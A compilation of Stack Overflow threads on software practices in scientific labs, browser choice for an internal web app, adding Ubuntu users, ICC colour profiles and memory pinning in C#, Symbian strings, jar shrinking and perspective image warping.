"source": "stackexchange",
"question_score": "288"
} |
Q: Practices for programming in a scientific environment? Background
Last year, I did an internship in a physics research group at a university. In this group, we mostly used LabVIEW to write programs for controlling our setups, doing data acquisition and analyzing our data. For the first two purposes, that works quite OK, but for data analysis, it's a real pain. On top of that, everyone was mostly self-taught, so code that was written was generally quite a mess (no wonder that every PhD quickly decided to rewrite everything from scratch). Version control was unknown, and impossible to set up because of strict software and network regulations from the IT department.
Now, things actually worked out surprisingly OK, but how do people in the natural sciences do their software development?
Questions
Some concrete questions:
*
*What languages/environments have you used for developing scientific software, especially data analysis? What libraries? (for example, what do you use for plotting?)
*Was there any training for people without any significant background in programming?
*Did you have anything like version control, and bug tracking?
*How would you go about trying to create a decent environment for programming, without getting too much in the way of the individual scientists (especially physicists are stubborn people!)
Summary of answers thus far
The answers (or my interpretation of them) thus far: (2008-10-11)
*
*Languages/packages that seem to be the most widely used:
*
*LabVIEW
*Python
*
*with SciPy, NumPy, PyLab, etc. (See also Brandon's reply for downloads and links)
*C/C++
*MATLAB
*Version control is used by nearly all respondents; bug tracking and other processes are much less common.
*The Software Carpentry course is a good way to teach programming and development techniques to scientists.
*How to improve things?
*
*Don't force people to follow strict protocols.
*Set up an environment yourself, and show the benefits to others. Help them to start working with version control, bug tracking, etc. themselves.
*Reviewing other people's code can help, but be aware that not everyone may appreciate that.
A: I'm not exactly a 'natural' scientist (I study transportation) but am an academic who writes a lot of my own software for data analysis. I try to write as much as I can in Python, but sometimes I'm forced to use other languages when I'm working on extending or customizing an existing software tool. There is very little programming training in my field. Most folks are either self-taught, or learned their programming skills from classes taken previously or outside the discipline.
I'm a big fan of version control. I used Vault running on my home server for all the code for my dissertation. Right now I'm trying to get the department to set up a Subversion server, but my guess is I will be the only one who uses it, at least at first. I've played around a bit with FogBugs, but unlike version control, I don't think that's nearly as useful for a one-man team.
As for encouraging others to use version control and the like, that's really the problem I'm facing now. I'm planning on forcing my grad students to use it on research projects they're doing for me, and encouraging them to use it for their own research. If I teach a class involving programming, I'll probably force the students to use version control there too (grading them on what's in the repository). As far as my colleagues and their grad students go, all I can really do is make a server available and rely on gentle persuasion and setting a good example. Frankly, at this point I think it's more important to get them doing regular backups than get them on source control (some folks are carrying around the only copy of their research data on USB flash drives).
A: 1.) Scripting languages are popular these days for most things due to better hardware. Perl/Python/Lisp are prevalent for lightweight applications (automation, light computation); I see a lot of Perl at my work (computational EM) since we like Unix/Linux. For performance stuff, C/C++/Fortran are typically used. For parallel computing, well, we usually manually parallelize runs in EM as opposed to having a program implicitly do it (ie split up the jobs by look angle when computing radar cross sections).
2.) We just kind of throw people into the mix here. A lot of the code we have is very messy, but scientists are typically a scatterbrained bunch that don't mind that sort of thing. Not ideal, but we have things to deliver and we're severely understaffed. We're slowly getting better.
3.) We use SVN; however, we do not have bug tracking software. About as good as it gets for us is a txt file that tells you where bugs specific bugs are.
4.) My suggestion for implementing best practices for scientists: do it slowly. As scientists, we typically don't ship products. No one in science makes a name for himself by having clean, maintainable code. They get recognition from the results of that code, typically. They need to see justification for spending time on learning software practices. Slowly introduce new concepts and try to get them to follow; they're scientists, so after their own empirical evidence confirms the usefulness of things like version control, they will begin to use it all the time!
A: I'd highly recommend reading "What Every Computer Scientist Should Know About Floating-Point Arithmetic". A lot of problems I encounter on a regular basis come from issues with floating point programming.
A: I am a physicist working in the field of condensed matter physics, building classical and quantum models.
Languages:
*
*C++ -- very versatile: can be used for anything, good speed, but it can be a bit inconvenient when it comes to MPI
*Octave -- good for some supplementary calculations, very convenient and productive
Libraries:
*
*Armadillo/Blitz++ -- fast array/matrix/cube abstractions for C++
*Eigen/Armadillo -- linear algebra
*GSL -- to use with C
*LAPACK/BLAS/ATLAS -- extremely big and fast, but less convenient (and written in FORTRAN)
Graphics:
*
*GNUPlot -- it has very clean and neat output, but not that productive sometimes
*Origin -- very convenient for plotting
Development tools:
*
*Vim + plugins -- it works great for me
*GDB -- a great debugging tool when working with C/C++
*Code::Blocks -- I used it for some time and found it quite comfortable, but Vim is still better in my opinion.
A:
What languages/environments have you used for developing scientific software, esp. data analysis? What libraries? (E.g., what do you use for plotting?)
Python, NumPy and pylab (plotting).
Was there any training for people without any significant background in programming?
No, but I was working in a multimedia research lab, so almost everybody had a computer science background.
Did you have anything like version control, bug tracking?
Yes, Subversion for version control, Trac for bug tracing and wiki. You can get free bug tracker/version control hosting from http://www.assembla.com/ if their TOS fits your project.
How would you go about trying to create a decent environment for programming, without getting too much in the way of the individual scientists (esp. physicists are stubborn people!).
Make sure the infrastructure is set up and well maintained and try to sell the benefits of source control.
A: Ex-academic physicist and now industrial physicist UK here:
What languages/environments have you used for developing scientific software, esp. data analysis? What libraries? (E.g., what do you use for plotting?)
I mainly use MATLAB these days (easy to access visualisation functions and maths). I used to use Fortran a lot and IDL. I have used C (but I'm more a reader than a writer of C), Excel macros (ugly and confusing). I'm currently needing to be able to read Java and C++ (but I can't really program in them) and I've hacked Python as well. For my own entertainment I'm now doing some programming in C# (mainly to get portability / low cost / pretty interfaces). I can write Fortran with pretty much any language I'm presented with ;-)
Was there any training for people without any significant background in programming?
Most (all?) undergraduate physics course will have a small programming course usually on C, Fortran or MATLAB but it's the real basics. I'd really like to have had some training in software engineering at some point (revision control / testing / designing medium scale systems)
Did you have anything like version control, bug tracking?
I started using Subversion / TortoiseSVN relatively recently. Groups I've worked with in the past have used revision control. I don't know any academic group which uses formal bug tracking software. I still don't use any sort of systematic testing.
How would you go about trying to create a decent environment for programming, without getting too much in the way of the individual scientists (esp. physicists are stubborn people!)
I would try to introduce some software engineering ideas at undergraduate level and then reinforce them by practice at graduate level, also provide pointers to resources like the Software Carpentry course mentioned above.
I'd expect that a significant fraction of academic physicists will be writing software (not necessarily all though) and they are in dire need of at least an introduction to ideas in software engineering.
A: I work as a physicist in a UK university.
Perhaps I should emphasise that different areas of research have different emphasis on programming. Particle physicists (like dmckee) do computational modelling almost exclusively and may collaborate on large software projects, whereas people in fields like my own (condensed matter) write code relatively infrequently. I suspect most scientists fall into the latter camp. I would say coding skills are usually seen as useful in physics, but not essential, much like physics/maths skills are seen as useful for programmers but not essential. With this in mind...
*
*What languages/environments have you used for developing scientific software, esp. data analysis? What libraries? (E.g., what do you use for plotting?)
Commonly data analysis and plotting is done using generic data analysis packages such as IGOR Pro, ORIGIN, Kaleidegraph which can be thought of as 'Excel plus'. These packages typically have a scripting language that can be used to automate. More specialist analysis may have a dedicated utility for the job that generally will have been written a long time ago, no-one has the source for and is pretty buggy. Some more techie types might use the languages that have been mentioned (Python, R, MatLab with Gnuplot for plotting).
Control software is commonly done in LabVIEW, although we actually use Delphi which is somewhat unusual.
*
*Was there any training for people without any significant background in programming?
I've been to seminars on grid computing, 3D visualisation, learning Boost etc. given by both universities I've been at. As an undergraduate we were taught VBA for Excel and MatLab but C/MatLab/LabVIEW is more common.
*
*Did you have anything like version control, bug tracking?
No, although people do have personal development setups. Our code base is in a shared folder on a 'server' which is kept current with a synching tool.
*
*How would you go about trying to create a decent environment for programming, without getting too much in the way of the individual scientists (esp. physicists are stubborn people!)
One step at a time! I am trying to replace the shared folder with something a bit more solid, perhaps finding a SVN client which mimics the current synching tools behaviour would help.
I'd say though on the whole, for most natural science projects, time is generally better spent doing research!
A: I'm a statistician at a university in the UK. Generally people here use R for data analysis, it's fairly easy to learn if you know C/Perl. Its real power is in the way you can import and modify data interactively. It's very easy to take a number of say CSV (or Excel) files and merge them, create new columns based on others and then throw that into a GLM, GAM or some other model. Plotting is trivial too and doesn't require knowledge of a whole new language (like PGPLOT or GNUPLOT.) Of course, you also have the advantage of having a bunch of built-in features (from simple things like mean, standard deviation etc all the way to neural networks, splines and GL plotting.)
Having said this, there are a couple of issues. With very large datasets R can become very slow (I've only really seen this with >50,000x30 datasets) and since it's interpreted you don't get the advantage of Fortran/C in this respect. But, you can (very easily) get R to call C and Fortran shared libraries (either from something like netlib or ones you've written yourself.) So, a usual workflow would be to:
*
*Work out what to do.
*Prototype the code in R.
*Run some preliminary analyses.
*Re-write the slow code into C or Fortran and call that from R.
Which works very well for me.
I'm one of the only people in my department (of >100 people) using version control (in my case using git with githuib.com.) This is rather worrying, but they just don't seem to be keen on trying it out and are content with passing zip files around (yuck.)
My suggestion would be to continue using LabView for the acquisition (and perhaps trying to get your co-workers to agree on a toolset for acquisition and making is available for all) and then move to exporting the data into a CSV (or similar) and doing the analysis in R. There's really very little point in re-inventing the wheel in this respect.
A: What languages/environments have you used for developing scientific software, esp. data analysis? What libraries? (E.g., what do you use for plotting?)
I used to work for Enthought, the primary corporate sponsor of SciPy. We collaborated with scientists from the companies that contracted Enthought for custom software development. Python/SciPy seemed to be a comfortable environment for scientists. It's much less intimidating to get started with than say C++ or Java if you're a scientist without a software background.
The Enthought Python Distribution comes with all the scientific computing libraries including analysis, plotting, 3D visualation, etc.
Was there any training for people without any significant background in programming?
Enthought does offer SciPy training and the SciPy community is pretty good about answering questions on the mailing lists.
Did you have anything like version control, bug tracking?
Yes, and yes (Subversion and Trac). Since we were working collaboratively with the scientists (and typically remotely from them), version control and bug tracking were essential. It took some coaching to get some scientists to internalize the benefits of version control.
How would you go about trying to create a decent environment for programming, without getting too much in the way of the individual scientists (esp. physicists are stubborn people!)
Make sure they are familiarized with the tool chain. It takes an investment up front, but it will make them feel less inclined to reject it in favor of something more familiar (Excel). When the tools fail them (and they will), make sure they have a place to go for help — mailing lists, user groups, other scientists and software developers in the organization. The more help there is to get them back to doing physics the better.
A: The course Software Carpentry is aimed specifically at people doing scientific computing and aims to teach the basics and lessons of software engineering, and how best to apply them to projects.
It covers topics like version control, debugging, testing, scripting and various other issues.
I've listened to about 8 or 9 of the lectures and think it is to be highly recommended.
Edit: The MP3s of the lectures are available as well.
A: Definitely, use Subversion to keep current, work-in-progress, and stable snapshot copies of source code. This includes C++, Java etc. for homegrown software tools, and quickie scripts for one-off processing.
With the strong leaning in science and applied engineering toward "lone cowboy" development methodology, the usual practice of organizing the repository into trunk, tag and whatever else it was - don't bother! Scientists and their lab technicians like to twirl knobs, wiggle electrodes and chase vacuum leaks. It's enough of a job to get everyone to agree to, say Python/NumPy or follow some naming convention; forget trying to make them follow arcane software developer practices and conventions.
A: For source code management, centralized systems such as Subversion are superior for scientific use due to the clear single point of truth (SPOT). Logging of changes and ability to recall versions of any file, without having chase down where to find something, has huge record-keeping advantages. Tools like Git and Monotone: oh my gosh the chaos I can imagine that would follow! Having clear-cut records of just what version of hack-job scripts were used while toying with the new sensor when that Higgs boson went by or that supernova blew up, will lead to happiness.
A: What languages/environments have you used for developing scientific software, esp. data analysis? What libraries? (E.g., what do you use for plotting?)
My undergraduate physics department taught LabVIEW classes and used it extensively in its research projects.
The other alternative is MATLAB, in which I have no experience. There are camps for either product; each has its own advantages/disadvantages. Depending on what kind of problems you need to solve, one package may be more preferable than the other.
Regarding data analysis, you can use whatever kind of number cruncher you want. Ideally, you can do the hard calculations in language X and format the output to plot nicely in Excel, Mathcad, Mathematica, or whatever the flavor du jour plotting system is. Don't expect standardization here.
Did you have anything like version control, bug tracking?
Looking back, we didn't, and it would have been easier for us all if we did. Nothing like breaking everything and struggling for hours to fix it!
Definitely use source control for any common code. Encourage individuals to write their code in a manner that could be made more generic. This is really just coding best practices. Really, you should have them teaching (or taking) a computer science class so they can get the basics.
How would you go about trying to create a decent environment for programming, without getting too much in the way of the individual scientists (esp. physicists are stubborn people!)
There is a clear split between data aquisition (DAQ) and data analysis. Meaning, it's possible to standardize on the DAQ and then allow the scientists to play with the data in the program of their choice.
A: Another good option is Scilab. It has graphic modules à la LabVIEW, it has its own programming language and you can also embed Fortran and C code, for example. It's being used in public and private sectors, including big industrial companies. And it's free.
About versioning, some prefer Mercurial, as it gives more liberties managing and defining the repositories. I have no experience with it, however.
For plotting I use Matplotlib. I will soon have to make animations, and I've seen good results using MEncoder. Here is an example including an audio track.
Finally, I suggest going modular, this is, trying to keep main pieces of code in different files, so code revision, understanding, maintenance and improvement will be easier. I have written, for example, a Python module for file integrity testing, another for image processing sequences, etc.
You should also consider developing with the use a debugger that allows you to check variable contents at settable breakpoints in the code, instead using print lines.
I have used Eclipse for Python and Fortran developing (although I got a false bug compiling a Fortran short program with it, but it may have been a bad configuration) and I'm starting to use the Eric IDE for Python. It allows you to debug, manage versioning with SVN, it has an embedded console, it can do refactoring with Bicycle Repair Man (it can use another one, too), you have Unittest, etc. A lighter alternative for Python is IDLE, included with Python since version 2.3.
As a few hints, I also suggest:
*
*Not using single-character variables. When you want to search appearances, you will get results everywhere. Some argue that a decent IDE makes this easier, but then you will depend on having permanent access to the IDE. Even using ii, jj and kk can be enough, although this choice will depend on your language. (Double vowels would be less useful if code comments are made in Estonian, for instance).
*Commenting the code from the very beginning.
*For critical applications sometimes it's better to rely on older language/compiler versions (major releases), more stable and better debugged.
Of course you can have more optimized code in later versions, fixed bugs, etc, but I'm talking about using Fortran 95 instead of 2003, Python 2.5.4 instead of 3.0, or so. (Specially when a new version breaks backwards compatibility.) Lots of improvements usually introduce lots of bugs. Still, this will depend on specific application cases!
Note that this is a personal choice, many people could argue against this.
*Use redundant and automated backup! (With versioning control).
A:
What languages/environments have you
used for developing scientific
software, esp. data analysis? What
libraries? (E.g., what do you use for
plotting?)
Languages I have used for numerics and sicentific-related stuff:
*
*C (slow development, too much debugging, almost impossible to write reusable code)
*C++ (and I learned to hate it -- development isn't as slow as C, but can be a pain. Templates and classes were cool initially, but after a while I realized that I was fighting them all the time and finding workarounds for language design problems
*Common Lisp, which was OK, but not widely used fo Sci computing. Not easy to integrate with C (if compared to other languages), but works
*Scheme. This one became my personal choice.
My editor is Emacs, although I do use vim for quick stuff like editing configuration files.
For plotting, I usually generate a text file and feed it into gnuplot.
For data analysis, I usually generate a text file and use GNU R.
I see lots of people here using FORTRAN (mostly 77, but some 90), lots of Java and some Python. I don't like those, so I don't use them.
Was there any training for people
without any significant background in
programming?
I think this doesn't apply to me, since I graduated in CS -- but where I work there is no formal training, but people (Engineers, Physicists, Mathematicians) do help each other.
Did you have anything like version
control, bug tracking?
Version control is absolutely important! I keep my code and data in three different machines, in two different sides of the world -- in Git repositories. I sync them all the time (so I have version control and backups!) I don't do bug control, although I may start doing that.
But my colleagues don't BTS or VCS at all.
How would you go about trying to
create a decent environment for
programming, without getting too much
in the way of the individual
scientists (esp. physicists are
stubborn people!)
First, I'd give them as much freedom as possible. (In the University where I work I could chooe between having someone install Ubuntu or Windows, or install my own OS -- I chose to install my own. I don't have support from them and I'm responsible for anything that happens with my machins, including security issues, but I do whatever I want with the machine).
Second, I'd see what they are used to, and make it work (need FORTRAN? We'll set it up. Need C++? No problem. Mathematica? OK, we'll buy a license). Then see how many of them would like to learn "additional tools" to help them be more productive (don't say "different" tools. Say "additional", so it won't seem like anyone will "lose" or "let go" or whatever). Start with editors, see if there are groups who would like to use VCS to sync their work (hey, you can stay home and send your code through SVN or GIT -- wouldn't that be great?) and so on.
Don't impose -- show examples of how cool these tools are. Make data analysis using R, and show them how easy it was. Show nice graphics, and explain how you've created them (but start with simple examples, so you can quickly explain them).
A: I would suggest F# as a potential candidate for performing science-related manipulations given its strong semantic ties to mathematical constructs.
Also, its support for units-of-measure, as written about here makes a lot of sense for ensuring proper translation between mathematical model and implementation source code.
A: Nuclear/particle physics here.
*
*Major programing work used to be done mostly in Fortran using CERNLIB (PAW, MINUIT, ...) and GEANT3, recently it has mostly been done in C++ with ROOT and Geant4. There are a number of other libraries and tools in specialized use, and LabVIEW sees some use here and there.
*Data acquisition in my end of this business has often meant fairly low level work. Often in C, sometimes even in assembly, but this is dying out as the hardware gets more capable. On the other hand, many of the boards are now built with FPGAs which need gate twiddling...
*One-offs, graphical interfaces, etc. use almost anything (Tcl/Tk used to be big, and I've been seeing more Perl/Tk and Python/Tk lately) including a number of packages that exist mostly inside the particle physics community.
*Many people writing code have little or no formal training, and process is transmitted very unevenly by oral tradition, but most of the software group leaders take process seriously and read as much as necessary to make up their deficiencies in this area.
*Version control for the main tools is ubiquitous. But many individual programmers neglect it for their smaller tasks. Formal bug tracking tools are less common, as are nightly builds, unit testing, and regression tests.
To improve things:
*
*Get on the good side of the local software leaders
*Implement the process you want to use in your own area, and encourage those you let in to use it too.
*Wait. Physicists are empirical people. If it helps, they will (eventually!) notice.
One more suggestion for improving things.
*Put a little time in to helping anyone you work directly with. Review their code. Tell them about algorithmic complexity/code generation/DRY or whatever basic thing they never learned because some professor threw a Fortran book at them once and said "make it work". Indoctrinate them on process issues. They are smart people, and they will learn if you give them a chance.
A: This might be slightly tangential, but hopefully relevant.
I used to work for National Instruments, R&D, where I wrote software for NI RF & Communication toolkits. We used LabVIEW quite a bit, and here are the practices we followed:
*
*Source control. NI uses Perforce. We did the regular thing - dev/trunk branches, continuous integration, the works.
*We wrote automated test suites.
*We had a few people who came in with a background in signal processing and communication. We used to have regular code reviews, and best practices documents to make sure their code was up to the mark.
*Despite the code reviews, there were a few occasions when "software guys", like me had to rewrite some of this code for efficiency.
*I know exactly what you mean about stubborn people! We had folks who used to think that pointing out a potential performance improvement in their code was a direct personal insult! It goes without saying that that this calls for good management. I thought the best way to deal with these folks is to go slowly, not press to hard for changes and if necessary be prepared to do the dirty work. [Example: write a test suite for their code].
A: I'm no expert in this area, but I've always understood that this is what MATLAB was created for. There is a way to integrate MATLAB with SVN for source control as well.
A: First of all, I would definitely go with a scripting language to avoid having to explain a lot of extra things (for example manual memory management is - mostly - ok if you are writing low-level, performance sensitive stuff, but for somebody who just wants to use a computer as an upgraded scientific calculator it's definitely overkill). Also, look around if there is something specific for your domain (as is R for statistics). This has the advantage of already working with the concepts the users are familiar with and having specialized code for specific situations (for example calculating standard deviations, applying statistical tests, etc in the case of R).
If you wish to use a more generic scripting language, I would go with Python. Two things it has going for it are:
*
*The interactive shell where you can experiment
*Its clear (although sometimes lengthy) syntax
As an added advantage, it has libraries for most of the things you would want to do with it.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38239",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "92"
} |
Q: Best browser for web application I am in a position where I can choose the client browser for my web app. The app is being used internally, and we are installing each client "manually".I would like to find a better solution for the browser,so :
What is a good browser that I can use as a client to a web application?
General functionalities I would like to have:
*
*opening the browser from a
shortcut, directly to the application's URL
*ability to restrict navigation to a set of allowed URLs
*fullscreen mode, no menu, no address bar
*javascript
*good CSS support
*ability to cancel Back button (or at least solve the "Webpage has expired" IE problem)
IE7 and FireFox are good candidates, but each seem to have it's own problems and issues.
A: Mozilla Prism seems ideal for your purposes.
It shares code with Firefox but is designed to run web applications without the usual Browser interface to make them appear more like desktop applications. So no back button or address bar to worry about.
Edit: Google Chrome has Application Shortcuts so that may now be a better option.
A: Your last point, solving the "webpage has expired" problem, can be solved entirely on the server side by judicious use of the "303 see other" HTTP status code. Instead of returning a new page immediately as the result of an HTTP POST, return a 303 result code that redirects to another page that is a GET, that gets the contents you would like to show. This allows the user to use the back button without getting that expired message.
A: Because of your specific requirements you might want to consider embedding the IE ActiveX into a desktop application. That way you get full control of the client.
A: Firefox with a little elbow grease is your best bet. I've written locked down extensions (one that's full screen and great for digital signage) as well as Live CD to ease deployment.
A: Firefox:
*
*multi-platform
*kiosk add-on
*patch the chrome logic with zip and javascript
*see the FF 3.1 javascript speed improvements
*easily deploy standard bookmarks
A: Although I realize this may not be an option yet, Google Chrome seems to have some features that have been added specifically to allow that. Again, maybe not usable, yet, but certainly very interesting!
(See also the Chrome presentation, 27:30)
A: Some other reasons to choose Firefox:
*
*Firebug
*Web Developer
*Tamper Data
These addons make it a lot easier to develop web application for.
A: Until people have more experience with Google Chrome I would think Firefox is a better choice. It is extendable, well supported.
I like Chrome, but Google just have the tendency to have long beta periods and some times abandon projects.
A: When you run into serious issues, with Firefox you can trace it down to the code and maybe get someone to fix it. With IE, you can't.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38280",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "1"
} |
Q: How do I add a user in Ubuntu? Specifically, what commands do I run from the terminal?
A: Here's the command I almost always use (adding user kevin):
useradd -d /home/kevin -s /bin/bash -m kevin
A: There's basicly 2 commands to do this...
*
*useradd
*adduser (which is a frendlier front end to useradd)
You have to run them has root.
Just read their manuals to find out how to use them.
A: Without a home directory
sudo useradd myuser
With home directory
sudo useradd -m myuser
Then set the password
sudo passwd myuser
Then set the shell
sudo usermod -s /bin/bash myuser
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38288",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "66"
} |
Q: Apply an ICC Color Profile to an image in C# (Dotnet) How does one convert an image from one color profile to another (screen to printer, or scanner to screen). In Visual C++ you would use the function in ICM.h, is there a managed way to do this with GDI+?
I need to use GDI+, not WPF. I'd prefer to have a managed solution, but if it is not available, I guess PInkvoke will have to suffice.
A: There are a number of solutions.
*
*For GDI+, check out this article at MSDN (HOW TO: Use GDI+ and Image Color Management to Adjust Image Colors).
*For WPF (.NET 3.0), see the System.Windows.Media namespace. There are a number of different classes, such as the BitmapEncoder, that have the concept of a ColorContext, which "Represents the International Color Consortium (ICC) or Image Color Management (ICM) color profile that is associated with a bitmap image."
Both of these seem pretty complex, so there's always the option of buying somebody else's code. Atalasoft's DotImage Photo Pro has ICC profile setting capabilities built in. The code is expensive; a dev license is almost 2k. But based on their participation in the dotnet community, I'd give them a whirl.
A: You should take a look at Lcms. Its a colour management system, fairly complete, but written in C. you can use pinvoke, but I would recommend Managed C++ wrapper. I am actually currently working on a managed wrapper around the engine (just the basics, colour profile conversion, lab readings). I can post a link to the code after i am complete. It may be a week or so though.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38295",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "4"
} |
Q: Tutorial on understanding strings in Symbian I have Carbide.c++ Developer from Nokia and I want to create applications for my S60 phone.
I've looked at the samples that goes with the different SDK's for S60 but I haven't found any simple explanation on how strings, called descriptors, are used in Symbian.
One of the problems are that I'm visually impaired and therefore it takes quite some time to read through large documents that has page up and page down with lots of unuseful info and I've given up.
I'm willing to give it another try. Can anyone help me?
A: Here are a few sites on blogspot that may help. They have RSS feeds that will hopefully be easier to consume than paging through PDFs.
*
*http://descriptor-tips.blogspot.com/
*http://descriptors.blogspot.com/
A: Yeah, The strings in Symbian is nightmarish.. atleast when you start with..
Here are few good references to help:
*
*Introducing the RBuf Descriptor from Symbian Developer
*Comparing C strings and descriptors from Forum Nokia discussion
*Using Symbian OS String Descriptors from NewLC
A: I'd second http://descriptors.blogspot.com/ This is invaluable for getting to grips with Descriptors.
Also, sites such as newlc.com have forums for Symbian C++ specific code problems.
A: The best advice regarding descriptors I give to any new Symbian developer in my company is to try and avoid using the descriptors when not necessary. The Symbian SDK has the libc API which includes stdio, stdlib, string and more. I usually use char* types and when necessary I convert it to a descriptor (when I need to send a string to an SDK method which requires it).
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38299",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "7"
} |
Q: Pinning pointer arrays in memory I'm currently working on a ray-tracer in C# as a hobby project. I'm trying to achieve a decent rendering speed by implementing some tricks from a c++ implementation and have run into a spot of trouble.
The objects in the scenes which the ray-tracer renders are stored in a KdTree structure and the tree's nodes are, in turn, stored in an array. The optimization I'm having problems with is while trying to fit as many tree nodes as possible into a cache line. One means of doing this is for nodes to contain a pointer to the left child node only. It is then implicit that the right child follows directly after the left one in the array.
The nodes are structs and during tree construction they are succesfully put into the array by a static memory manager class. When I begin to traverse the tree it, at first, seems to work just fine. Then at a point early in the rendering (about the same place each time), the left child pointer of the root node is suddenly pointing at a null pointer. I have come to the conclusion that the garbage collecter has moved the structs as the array lies on the heap.
I've tried several things to pin the addresses in memory but none of them seems to last for the entire application lifetime as I need. The 'fixed' keyword only seems to help during single method calls and declaring 'fixed' arrays can only be done on simple types which a node isn't. Is there a good way to do this or am I just too far down the path of stuff C# wasn't meant for.
Btw, changing to c++, while perhaps the better choice for a high performance program, is not an option.
A: Firstly, if you're using C# normally, you can't suddenly get a null reference due to the garbage collector moving stuff, because the garbage collector also updates all references, so you don't need to worry about it moving stuff around.
You can pin things in memory but this may cause more problems than it solves. For one thing, it prevents the garbage collector from compacting memory properly, and may impact performance in that way.
One thing I would say from your post is that using structs may not help performance as you hope. C# fails to inline any method calls involving structs, and even though they've fixed this in their latest runtime beta, structs frequently don't perform that well.
Personally, I would say C++ tricks like this don't generally tend to carry over too well into C#. You may have to learn to let go a bit; there can be other more subtle ways to improve performance ;)
A: What is your static memory manager actually doing? Unless it is doing something unsafe (P/Invoke, unsafe code), the behaviour you are seeing is a bug in your program, and not due to the behaviour of the CLR.
Secondly, what do you mean by 'pointer', with respect to links between structures? Do you literally mean an unsafe KdTree* pointer? Don't do that. Instead, use an index into the array. Since I expect that all nodes for a single tree are stored in the same array, you won't need a separate reference to the array. Just a single index will do.
Finally, if you really really must use KdTree* pointers, then your static memory manager should allocate a large block using e.g. Marshal.AllocHGlobal or another unmanaged memory source; it should both treat this large block as a KdTree array (i.e. index a KdTree* C-style) and it should suballocate nodes from this array, by bumping a "free" pointer.
If you ever have to resize this array, then you'll need to update all the pointers, of course.
The basic lesson here is that unsafe pointers and managed memory do not mix outside of 'fixed' blocks, which of course have stack frame affinity (i.e. when the function returns, the pinned behaviour goes away). There is a way to pin arbitrary objects, like your array, using GCHandle.Alloc(yourArray, GCHandleType.Pinned), but you almost certainly don't want to go down that route.
You will get more sensible answers if you describe in more detail what you are doing.
A: If you really want to do this, you can use the GCHandle.Alloc method to specify that a pointer should be pinned without being automatically released at the end of the scope like the fixed statement.
But, as other people have been saying, doing this is putting undue pressure on the garbage collector. What about just creating a struct that holds onto a pair of your nodes and then managing an array of NodePairs rather than an array of nodes?
If you really do want to have completely unmanaged access to a chunk of memory, you would probably be better off allocating the memory directly from the unmanaged heap rather than permanently pinning a part of the managed heap (this prevents the heap from being able to properly compact itself). One quick and simple way to do this would be to use Marshal.AllocHGlobal method.
A: Is it really prohibitive to store the pair of array reference and index?
A:
What is your static memory manager actually doing? Unless it is doing something unsafe (P/Invoke, unsafe code), the behaviour you are seeing is a bug in your program, and not due to the behaviour of the CLR.
I was in fact speaking about unsafe pointers. What I wanted was something like Marshal.AllocHGlobal, though with a lifetime exceeding a single method call. On reflection it seems that just using an index is the right solution as I might have gotten too caught up in mimicking the c++ code.
One thing I would say from your post is that using structs may not help performance as you hope. C# fails to inline any method calls involving structs, and even though they've fixed this in their latest run-time beta, structs frequently don't perform that well.
I looked into this a bit and I see it has been fixed in .NET 3.5SP1; I assume that's what you were referring to as the run-time beta. In fact, I now understand that this change accounted for a doubling of my rendering speed. Now, structs are aggressively in-lined, improving their performance greatly on X86 systems (X64 had better struct performance in advance).
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38302",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "1"
} |
Q: How do I strip the fluff out of a third party library? It may not be best practice but are there ways of removing unsused classes from a third party's jar files. Something that looks at the way in which my classes are using the library and does some kind of coverage analysis, then spits out another jar with all of the untouched classes removed.
Obviously there are issues with this. Specifically, the usage scenario I put it though may not use all classes all the time.
But neglecting these problems, can it be done in principle?
A: There is a way.
The JarJar project does this AFAIR. The first goal of the JarJar project is to allow one to embed third party libraries in your own jar, changing the package structure if necessary. Doing so it can strip out the classes that are not needed.
Check it out at http://code.google.com/p/jarjar/.
Here is a link about shrinking jars: http://sixlegs.com/blog/java/jarjar-keep.html
A: There is a tool in Ant called a classfileset. You specify the list of root classes that you know you need, and then the classfileset recursively analyzes their code to find all dependencies.
Alternatively, you could develop a good test suite that exercises all of the functions that you need, then run your tests under a test coverage tool. The tool will tell you which classes (and statement in them) were actually utilized. This could give you an even smaller set of code than what you'd find with static analysis.
A: I use ProGuard for this. As well as being an excellent obfuscator, it has a code shrinking phase which can combine multiple JARs and then strip out any unused classes or class members. It does an excellent job at shrinking.
A: At a previous job, I used a Java obfuscator that as well as obfuscating the code, also removed classes and methods that weren't being used. If you were doing "Class.byName" or any other type of reflection stuff, you needed to tell the obfuscator because it couldn't tell by inspecting the code what classes or methods called by reflection.
The problem, of course, is that you don't know if other parts of the third party library are doing any reflection, and so removing an "unused" class might cause things to break in an obscure case that you haven't tested.
A: jar is just a zip file, so I guess you can. If you could get to the source, it's cleaner. Maybe try disassembling the class?
A: Adding to this question, can that improve performance? Since the classes not used would not be JIT compiled improving startup time or does the java automatically detect that while compiling to bytecode and do not even deal with the code that is not used?
A: This would be an interesting project (has anyone done it already?)
I presume you'd give the tool your jar(s) as a starting point, and the library jar to clean up. It could use reflection to determine which classes your jar(s) reference directly, and which are used indirectly down the call tree (this is not trivial at all, but doable). If it encounters any reflection code in any of the two places, it should give a very loud warning.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38305",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "4"
} |
Q: Is there any way to draw an image to use 4 points rather than 3 (perspective warp) Drawing a parallelgram is nicely supported with Graphics.DrawImage:
Bitmap destImage = new Bitmap(srcImage.Width, srcImage.Height);
using (Graphics gr = new Graphics.FromImage(destImage))
{
Point[] destPts = new Point[] { new PointF(x1, y1),
new PointF(x2, y2), new PointF(x4, y4)};
gr.DrawImage(srcImage, destPts);
How, do you do 4 points (obviously the following is not supported, but this is what is wanted):
Bitmap destImage = new Bitmap(srcImage.Width, srcImage.Height);
using (Graphics gr = new Graphics.FromImage(destImage))
{
Point[] destPts = new Point[] { new PointF(x1, y1), new PointF(x2, y2),
new PointF(x3, y3), new PointF(x4, y4)};
gr.DrawImage(srcImage, destPts);
}
